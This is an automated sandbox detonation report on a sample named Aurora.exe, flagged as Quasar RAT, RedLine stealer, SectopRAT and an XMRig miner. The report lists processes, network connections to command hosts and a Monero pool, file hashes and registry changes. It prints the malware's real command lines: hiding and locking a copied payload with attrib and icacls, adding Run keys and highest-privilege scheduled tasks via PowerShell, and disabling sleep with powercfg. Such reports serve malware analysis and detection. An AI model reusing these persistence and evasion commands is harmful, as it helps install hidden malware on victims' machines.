PID 2780 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2780 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2780 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2780 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2780 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2780 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2780 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2780 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2780 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2780 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2780 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 340 wrote to memory of 1644 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 340 wrote to memory of 1644 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 340 wrote to memory of 1644 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\Aurora.exe

"C:\Users\Admin\AppData\Local\Temp\Aurora.exe"

C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe

"C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe"

C:\Users\Admin\AppData\Roaming\Microsoft Edge\build.exe

"C:\Users\Admin\AppData\Roaming\Microsoft Edge\build.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd /Q /C " ping localhost -n 1 && copy "C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" "C:\Users\Admin\AppData\Local\Msedge.exe" && attrib +r +h +a "C:\Users\Admin\AppData\Local\Msedge.exe" && icacls "C:\Users\Admin\AppData\Local\Msedge.exe" /deny "everyone":(WD,AD,WEA,WA) && del "C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" && cmd /C "start "C:\Users\Admin\AppData\Local\Msedge.exe" && exit" && && exit "

C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe

"C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe"

C:\Windows\system32\cmd.exe

cmd /Q /C " ping localhost -n 1 && copy "C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" "C:\Users\Admin\AppData\Local\Msedge.exe" && attrib +r +h +a "C:\Users\Admin\AppData\Local\Msedge.exe" && icacls "C:\Users\Admin\AppData\Local\Msedge.exe" /deny "everyone":(WD,AD,WEA,WA) && del "C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" && cmd /C "start "C:\Users\Admin\AppData\Local\Msedge.exe"

C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe

"C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe"

C:\Windows\system32\PING.EXE

ping localhost -n 1

C:\Windows\system32\attrib.exe

attrib +r +h +a "C:\Users\Admin\AppData\Local\Msedge.exe"

C:\Windows\system32\icacls.exe

icacls "C:\Users\Admin\AppData\Local\Msedge.exe" /deny "everyone":(WD,AD,WEA,WA)

C:\Windows\system32\cmd.exe

cmd /C "start "C:\Users\Admin\AppData\Local\Msedge.exe

C:\Users\Admin\AppData\Local\Msedge.exe

C:\Users\Admin\AppData\Local\Msedge.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OneDriveUpdate';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OneDriveUpdate' -Value '"C:\Users\Admin\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe"' -PropertyType 'String'

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \OneDriveUpdate /tr "C:\Users\Admin\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \OneDriveUpdate /tr "C:\Users\Admin\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#npnsokoe#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'ConsoleWindowsHost' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ConsoleWindowsHost' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn ConsoleWindowsHost /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe'

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "ConsoleWindowsHost"

C:\Windows\system32\taskeng.exe

taskeng.exe {D836DB8D-E9AF-4557-B32A-0E25C2D2934D} S-1-5-21-3551809350-4263495960-1443967649-1000:NNYJZAHP\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe

C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#npnsokoe#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'ConsoleWindowsHost' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ConsoleWindowsHost' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn ConsoleWindowsHost /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe'

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe

Network

Country Destination Domain Proto
GB 154.81.220.233:28105 tcp
US 8.8.8.8:53 auroraforge.art udp
US 192.64.119.108:55326 auroraforge.art tcp
GB 154.81.220.233:28105 tcp
GB 154.81.220.233:28105 tcp
GB 154.81.220.233:28105 tcp
GB 154.81.220.233:28105 tcp
US 8.8.8.8:53 thesirenmika.com udp
CN 123.123.123.123:55713 thesirenmika.com tcp
US 8.8.8.8:53 xmr-us-east1.nanopool.org udp
CA 51.79.71.77:14444 xmr-us-east1.nanopool.org tcp
GB 154.81.220.233:28105 tcp
GB 154.81.220.233:28105 tcp
US 192.64.119.108:55326 auroraforge.art tcp
GB 154.81.220.233:28105 tcp
CN 123.123.123.123:55713 thesirenmika.com tcp
GB 154.81.220.233:28105 tcp
GB 154.81.220.233:28105 tcp
GB 154.81.220.233:28105 tcp
GB 154.81.220.233:28105 tcp
US 192.64.119.108:55326 auroraforge.art tcp
GB 154.81.220.233:28105 tcp
GB 154.81.220.233:28105 tcp
GB 154.81.220.233:28105 tcp
GB 154.81.220.233:28105 tcp
CN 123.123.123.123:55713 thesirenmika.com tcp
GB 154.81.220.233:28105 tcp
GB 154.81.220.233:28105 tcp
GB 154.81.220.233:28105 tcp

Files

memory/3052-0-0x0000000000E00000-0x00000000028CA000-memory.dmp

memory/3052-2-0x00000000767B0000-0x00000000767F7000-memory.dmp

memory/3052-1-0x00000000767BE000-0x00000000767BF000-memory.dmp

memory/3052-3-0x00000000767B0000-0x00000000767F7000-memory.dmp

memory/3052-7-0x00000000767B0000-0x00000000767F7000-memory.dmp

C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe

MD5 65f0a85c4b056d6bcee60c49e2372e35
SHA1 6af820a2030950617bf150777af4a43a06a17184
SHA256 d64768ea74224057220bff451504b6128ddfb6161617b668626c490c84b3ae8e
SHA512 7a50bd0b3908f830494b2bff13a051ba0cdc7900934dbf8a62616f6d29b914f05f8029bbcc429a095254ebb6ab2a2d92c05dd6aebf57e34cde20f152243df383

C:\Users\Admin\AppData\Roaming\Microsoft Edge\build.exe

MD5 c9a9d471428a5f92068c0823e6454254
SHA1 8b8ee8612b9b8bfbb165b3a8ca0d4a377b589dd2
SHA256 b0ffaa8c7d8fe1e804afc87e6f7659483c69d421911ddbfc410270011b91bfb5
SHA512 ca34022e99a48639fb3566ec4eb901a2f91121aee6a1f1bc601492dd94387873afc8af499aefed8d644aef8f564ca46a12ea40176da7f8d7b4e60f4b505ac8af

memory/2808-22-0x00000000767B0000-0x00000000767F7000-memory.dmp

\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe

MD5 3b4f58cd4bca7274be25e885be00798b
SHA1 eb57c281d8324a1079db97c9da43483a65debbed
SHA256 a6832546e1d261c33deea58e1cbb8a391af91628b130454d55aef3e292862d80
SHA512 dc909730b2feacba3c14c98a2b443d5c12dfd74ce74db53cf7e564e01707ac365811e4d3b95c0cefe2b87ebd1b074fb4a395360911c3d11de4fa8957e9bad121

\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe

MD5 b9fc8581b52abfc6b563da731438e27d
SHA1 43111fe9b307c850a379fe2d64d279e994680de3
SHA256 e03debe75b2f4f4c937c50773064b9a692b262bfce4472e67900edf3f7726058
SHA512 c62540e73870caf9a93fbc2396ac99867f8f6e87661240d7642022130008bdb769954f1e8a58d13698172e62cc5b7d44a73b2f1d999db47822eb294c629436a5

memory/2808-33-0x0000000000BC0000-0x0000000000BDE000-memory.dmp

memory/2780-34-0x0000000000830000-0x0000000000B5E000-memory.dmp

memory/3052-40-0x00000000767B0000-0x00000000767F7000-memory.dmp

memory/3052-43-0x0000000000E00000-0x00000000028CA000-memory.dmp

memory/2004-47-0x0000000000400000-0x0000000000724000-memory.dmp

memory/2004-49-0x0000000000400000-0x0000000000724000-memory.dmp

memory/2004-55-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2004-56-0x0000000000400000-0x0000000000724000-memory.dmp

memory/2004-58-0x0000000000400000-0x0000000000724000-memory.dmp

memory/2004-57-0x0000000000400000-0x0000000000724000-memory.dmp

memory/2004-53-0x0000000000400000-0x0000000000724000-memory.dmp

memory/2004-51-0x0000000000400000-0x0000000000724000-memory.dmp

memory/2580-59-0x000000013F5A0000-0x000000013FB3A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\S706453V6N591KYNT1TQ.temp

MD5 02a8a7bcae39f969197d0e8ef57a8267
SHA1 5677cde09d659bdcca4644e1991b17b95ff72d06
SHA256 03a4cf272daafef8d70d2414f09ad6652f4fbe1c1f19b68e2a6c4b78a855ac47
SHA512 8f6c40f9810c9b5def8f74789a219cbe9a9c7f306a5be40ff38d6dd052239806073b9e7a55f94e424e876cd99b55f58c0b7574717a160186f06200de16c50961

memory/1732-64-0x000000001B4C0000-0x000000001B7A2000-memory.dmp

memory/1732-65-0x0000000002850000-0x0000000002858000-memory.dmp

memory/2580-68-0x000000013F5A0000-0x000000013FB3A000-memory.dmp

memory/2808-72-0x00000000767B0000-0x00000000767F7000-memory.dmp

memory/316-73-0x000000013FEF0000-0x000000014048A000-memory.dmp

memory/3012-79-0x000000001B4E0000-0x000000001B7C2000-memory.dmp

memory/3012-80-0x0000000001E40000-0x0000000001E48000-memory.dmp

memory/1348-85-0x00000000000B0000-0x00000000000D0000-memory.dmp

memory/316-86-0x000000013FEF0000-0x000000014048A000-memory.dmp

memory/276-87-0x0000000140000000-0x0000000140029000-memory.dmp

memory/1348-88-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1348-90-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/276-92-0x0000000140000000-0x0000000140029000-memory.dmp

memory/1348-93-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1348-95-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1348-97-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1348-99-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1348-101-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1348-103-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1348-105-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1348-107-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1348-109-0x0000000140000000-0x00000001407EF000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-26 19:18

Reported

2024-07-26 19:22

Platform

win10v2004-20240709-en

Max time kernel

149s

Max time network

160s

Command Line

C:\Windows\Explorer.EXE

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 4220 created 3432 N/A C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe C:\Windows\Explorer.EXE
PID 4220 created 3432 N/A C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe C:\Windows\Explorer.EXE
PID 4220 created 3432 N/A C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe C:\Windows\Explorer.EXE
PID 724 created 3432 N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe C:\Windows\Explorer.EXE
PID 724 created 3432 N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe C:\Windows\Explorer.EXE
PID 724 created 3432 N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe C:\Windows\Explorer.EXE
PID 724 created 3432 N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe C:\Windows\Explorer.EXE

xmrig

miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\Aurora.exe N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\Aurora.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\Aurora.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Aurora.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft Edge\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Edge = "C:\\Users\\Admin\\AppData\\Local\\Msedge.exe" C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDriveUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\OneDriveUpdate\\OneDrive Updater.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\Aurora.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Power Settings

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\powercfg.exe N/A
N/A N/A C:\Windows\System32\powercfg.exe N/A
N/A N/A C:\Windows\System32\powercfg.exe N/A
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\System32\powercfg.exe N/A
N/A N/A C:\Windows\System32\powercfg.exe N/A
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\System32\powercfg.exe N/A
N/A N/A C:\Windows\System32\powercfg.exe N/A
N/A N/A C:\Windows\System32\powercfg.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2680 set thread context of 2128 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 724 set thread context of 2960 N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe C:\Windows\System32\conhost.exe
PID 724 set thread context of 1220 N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe C:\Windows\System32\svchost.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Aurora.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Microsoft Edge\build.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft Edge\build.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
